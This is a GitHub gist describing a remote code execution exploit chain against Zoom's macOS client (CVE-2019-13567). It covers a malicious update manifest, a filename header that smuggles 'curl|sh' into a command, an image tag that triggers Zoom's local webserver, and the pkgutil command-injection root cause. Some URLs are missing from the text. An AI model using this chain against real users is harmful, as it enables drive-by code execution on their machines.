Skip to content

Instantly share code, notes, and snippets.

Last active January 1, 2022 22:33
Show Gist options
  • Save wbowling/13f9f90365c171806b9ffba2c841026b to your computer and use it in GitHub Desktop.
Save wbowling/13f9f90365c171806b9ffba2c841026b to your computer and use it in GitHub Desktop.
Zoom RCE - CVE-2019-13567


  1. Create a malicious update manifest with the Package-url pointing a server you control:
  1. Upload the manifest it to a domain, one example is as the icon for a new app (there are client side checks to see if it's an image but they can be bypassed):

  2. Use .htaccess (or any other method) to change the filename of the malicious package pointed to by Package-url in the manifest:

Header set Content-Disposition 'attachment; filename="aaaa$(curl|sh).pkg"'
  1. Create a malicous link to hit the local zoom webserver. To bypass the domain checks it must be a valid subdomain for and also end with This is still allows use to create a link to our manifest hosted on http://localhost:19421/launch?

  2. Create an image with the link and host is somewhere:

<img src="http://localhost:19421/launch?">

The RCE is possible due to the download url being created with:

[NSString stringWithFormat:@"https://%@/upgrade?os=mac", domain]

This allows for any link to be created, it just needs to be a valid subdomain (host is checked on the generated url) and also end with a valid subdomain.

After downloading the manifest, the package is downloaded and the signature is checked with:

NSString *cmd = [NSString stringWithFormat:@"pkgutil --check-signature \"%@\"", filename];
[cmd runAsCommand]

This allows for trivial command injection in via a malicious filename

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment